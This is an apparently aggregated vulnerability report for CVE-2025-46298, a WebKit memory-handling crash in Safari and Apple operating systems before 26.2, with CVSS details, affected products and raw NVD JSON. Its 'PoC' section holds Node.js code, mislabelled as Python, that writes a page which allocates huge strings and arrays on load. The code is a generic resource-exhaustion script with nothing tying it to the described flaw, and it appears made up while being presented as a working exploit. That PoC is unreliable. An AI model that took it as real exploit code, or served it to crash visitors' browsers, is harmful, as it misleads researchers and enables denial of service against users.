Security Vulnerability Report
中文
CVE-2025-46298 CVSS 6.5 MEDIUM

CVE-2025-46298

Published: 2026-01-09 22:16:00
Last Modified: 2026-04-02 19:21:05
Source: [email protected]

Description

The issue was addressed with improved memory handling. This issue is fixed in Safari 26.2, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, tvOS 26.2, visionOS 26.2, watchOS 26.2. Processing maliciously crafted web content may lead to an unexpected process crash.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:* - VULNERABLE
Safari < 26.2
iOS < 26.2
iPadOS < 26.2
macOS Tahoe < 26.2
tvOS < 26.2
visionOS < 26.2
watchOS < 26.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-46298 PoC - Memory corruption leading to crash // This PoC demonstrates the vulnerability in WebKit memory handling // Note: This is for educational and security research purposes only const fs = require('fs'); function generateMaliciousHTML() { return ` <!DOCTYPE html> <html> <head> <title>CVE-2025-46298 Test Page</title> </head> <body> <script> // Trigger memory handling vulnerability function triggerVulnerability() { // Create objects that may trigger memory handling issues const elements = []; for (let i = 0; i < 1000; i++) { // Create and destroy DOM elements rapidly const div = document.createElement('div'); div.innerHTML = '<span>' + 'A'.repeat(10000) + '</span>'; elements.push(div); } // Force garbage collection patterns that may expose the bug elements.length = 0; // Create specific patterns that trigger the vulnerability const str = 'A'.repeat(0xFFFFFF); const arr = new Array(0xFFFFFF); for (let i = 0; i < arr.length; i++) { arr[i] = str.substring(0, 100); } } // Execute when page loads window.onload = function() { setTimeout(triggerVulnerability, 100); }; </script> </body> </html> `; } // Save PoC to file const html = generateMaliciousHTML(); fs.writeFileSync('CVE-2025-46298_poc.html', html); console.log('PoC generated: CVE-2025-46298_poc.html'); console.log('Open this file in Safari < 26.2 to trigger the vulnerability');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46298", "sourceIdentifier": "[email protected]", "published": "2026-01-09T22:15:59.693", "lastModified": "2026-04-02T19:21:04.973", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "The issue was addressed with improved memory handling. This issue is fixed in Safari 26.2, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, tvOS 26.2, visionOS 26.2, watchOS 26.2. Processing maliciously crafted web content may lead to an unexpected process crash."}, {"lang": "es", "value": "El problema se abordó con una gestión de memoria mejorada. Este problema está solucionado en tvOS 26.2, Safari 26.2, watchOS 26.2, visionOS 26.2, iOS 26.2 y iPadOS 26.2, macOS Tahoe 26.2. Procesar contenido web diseñado maliciosamente puede provocar un cierre inesperado del proceso."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "3ECBF838-536C-47F9-9876-C526B8ED32EC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "EA029506-5678-444B-93B5-27DAD643A1C0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "6276FDCA-3407-4FDD-8437-B57C98A97084"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "FBA92B6D-E36C-432B-A041-94D81427CD75"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "E0BBFB45-21F3-4B72-8DB1-BE72AFE0D2AB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "EB10D901-4800-4DF9-AB35-48017C178161"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "15574823-ECE0-4394-99BC-6AFA34E599CC"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125884", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125886", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125889", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125890", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125891", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125892", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.